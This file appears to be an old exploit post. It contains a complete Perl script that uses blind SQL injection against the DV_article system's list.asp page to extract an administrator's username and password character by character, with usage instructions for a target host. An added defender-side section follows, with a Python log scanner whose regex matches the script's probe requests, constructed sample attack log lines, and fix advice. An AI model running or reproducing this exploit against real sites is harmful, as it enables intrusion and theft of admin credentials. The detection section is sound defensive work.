
expoilt.txt

The 盗帅 article system (DV_article) has an unsanitized-variable vulnerability; please correct me if anything is wrong!
#Note: this code only tests passwords made of lowercase letters; it does not work for passwords containing uppercase letters!

#!/usr/bin/perl
#The script Crack user&pass for DV_article system
#Code by wawa@21cn.com
#Grouppage Http://www.Haowawa.com/
#Homepage Http://wawa.Haowawa.com/

use IO::Socket;

system('cls'); 
$ARGC = @ARGV; 
if ($ARGC != 4) 
{ 
   print "\n\n";
   print "\t* The script Crack user&pass for DV_article system *\n";
   print "\n\t   Welcom to www.Haowawa.com && wawa.haowawa.com\n";
   print "\n\tExample: dvTxt.pl 127.0.0.1 /txt/list.asp 53 \"没有找到相关文章\"\n";
   print "\t         dvTxt.pl <host> <way> <articleID> <errInfo>\n\n\n";
   exit; 
} 

$host = @ARGV[0];
$way = @ARGV[1];
$txtid = @ARGV[2];
$errinfo =@ARGV[3];
$port = 80; 

print "\n\t* Welcom to http://www.Haowawa.com && http://wawa.haowawa.com *\n";
print "\n\n开始在 $host 上进行测试,请等待......\n";

for ($adminid=1;$adminid<=100;$adminid++)
{
    $way1 = "?id=$txtid%20AND%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)";
    
	&url;@res = &connect;

#print @res;
    
        if ("@res" !~ /$errinfo/) 
           { 
             print "\n\t* 发现一管理员ID号为: $adminid \n";
             last;
           }
}

for ($passlen=1;$passlen<=10;$passlen++)
{
    $way1 = "?id=$txtid%20AND%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)";

    &url;@res = &connect;
     
        if ("@res" !~ /$errinfo/) 
           {       
             print "\n\t* 发现ID=$adminid的管理员的密码长度为: $passlen 位\n";
             last;
           }
}

for ($userlen=1;$userlen<=20;$userlen++)
{
    $way1 = "?id=$txtid%20AND%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)";

    &url;@res = &connect;
     
        if ("@res" !~ /$errinfo/) 
           {       
             print "\n\t* 发现ID=$adminid的管理员的用户名长度为: $userlen 位\n";
             last;
           }
}


@dig=(0..9);
@char=(a..z);
@tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\);
@dic=(@dig,@char,@tchar);
@dic1=(@char,@dig,@tchar);

print "\n开始尝试获取ID=$adminid的管理员的用户名及密码,请等待......\n";

for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
    foreach $usertemp(@dic1)
    {
        $user=$userdic.$usertemp;

        $way1 = "?id=$txtid%20AND%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)";

        &url;@res = &connect;
    
        if ("@res" !~ /$errinfo/) 
             {       
                if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员名字是: $user\n";last;}
				print "\n\t* ID=$adminid的管理员名字的前 $userlocat 位为 $user";
                $userdic=$userdic.$usertemp;
                last;
             }
     }    
}

for ($passlocat=1;$passlocat<=$passlen;$passlocat++)
{
    foreach $passtemp(@dic)
    {
        $pass=$passdic.$passtemp;

        $way1 = "?id=$txtid%20AND%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)";

        &url;@res = &connect;
    
        if ("@res" !~ /$errinfo/) 
             {       
                if ($passlocat==$passlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员密码是: $pass";last;}
				print "\n\t* ID=$adminid的管理员密码的前 $passlocat 位为 $pass";
                $passdic=$passdic.$passtemp;
                last;
             }
     }    
}


print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! *\n";
print "\n\n\n";
#system('pause');

sub url
{
   $req = "GET $way$way1 HTTP/1.0\n".
          "Host: $host\n".
          "Referer: $host\n".
          "Cookie: \n\n";  
}



sub connect 
{
   my $connection = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$host,
                                PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

   print $connection $req;
   my @res = <$connection>; 
   close $connection;
   return @res;
}
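From the defender's side, the script above is a boolean-based blind SQL injection: every request appends `AND <condition>=(select ... from admin ...)` to the `id` parameter of `list.asp`, and the "no article found" error text acts as the oracle for one bit of information per request. Each recovered character therefore costs up to one request per dictionary entry, so an access log records dozens of near-identical requests from one client, all carrying `select min(id)`, `select len(...)` or `select mid(...)` sub-selects. The following is an added detection example, not part of the original exploit or of the DV_article system; the log lines are constructed in a simplified IIS/W3C layout (date, time, client IP, method, URI stem, URI query, status), the IPs are documentation addresses, and the `/txt/list.asp` path is taken from the script's usage example.

```python
"""Detect the blind-SQLi oracle probes sent by the DV_article cracker by
scanning web-server access logs. Added defender-side example; the log
lines are constructed, not captured from a real server."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: three probe requests from one client (one of each
# probe shape the script uses) and one ordinary article request.
SAMPLE_LOG = """\
2004-05-01 10:00:01 203.0.113.7 GET /txt/list.asp id=53%20AND%201=(select%20min(id)%20from%20admin%20where%20flag=1) 200
2004-05-01 10:00:02 203.0.113.7 GET /txt/list.asp id=53%20AND%206=(select%20len(password)%20from%20admin%20where%20id=1) 200
2004-05-01 10:00:03 203.0.113.7 GET /txt/list.asp id=53%20AND%20'a'=(select%20mid(username,1,1)%20from%20admin%20where%20id=1) 200
2004-05-01 10:00:04 198.51.100.9 GET /txt/list.asp id=53 200
"""

# Simplified W3C field layout assumed for the constructed lines above.
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")

# One pattern covering the three probe shapes in the script:
#   AND <n>=(select min(id) ...)          -> admin-row discovery
#   AND <n>=(select len(col) ...)         -> length extraction
#   AND '<s>'=(select mid(col,1,k) ...)   -> character-by-character extraction
PROBE_RE = re.compile(
    r"\bAND\b\s*'?[^'=]*'?\s*=\s*\(\s*select\s+(min|len|mid)\s*\(",
    re.IGNORECASE,
)


def classify(query: str):
    """Return the probe kind ('min', 'len' or 'mid') when the URL-decoded
    query string carries one of the oracle sub-selects, else None."""
    decoded = unquote_plus(query)
    m = PROBE_RE.search(decoded)
    return m.group(1).lower() if m else None


def scan(log_text: str):
    """Count probe hits per client IP, split by probe kind.

    Returns {ip: {kind: count}}; clients with no hits are omitted."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        ip, query = m.group(3), m.group(6)
        kind = classify(query)
        if kind:
            hits[ip][kind] += 1
    return {ip: dict(kinds) for ip, kinds in hits.items()}


def extraction_sources(log_text: str, threshold: int = 3):
    """IPs whose total probe count reaches `threshold`, sorted.

    A legitimate client never puts a sub-select in the id parameter, so a
    single hit already deserves an alert; the threshold (an assumed value)
    only ranks sources that are clearly running the extraction loop."""
    return sorted(ip for ip, kinds in scan(log_text).items()
                  if sum(kinds.values()) >= threshold)


if __name__ == "__main__":
    for ip, kinds in scan(SAMPLE_LOG).items():
        print(ip, kinds)
    print("extraction sources:", extraction_sources(SAMPLE_LOG))
```

The regex is written against the decoded query, because the script percent-encodes only spaces; the request also carries two cheap secondary fingerprints visible in the `sub url` above (an `HTTP/1.0` request line with an empty `Cookie:` header, and a `Referer:` equal to the bare host name), but the sub-select in `id` is the signal that does not depend on the tool. The real fix is in the application: treat `id` as an integer and bind it as a query parameter instead of interpolating it into the SQL text, after which every probe above evaluates to the same "no article found" page and the oracle disappears.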
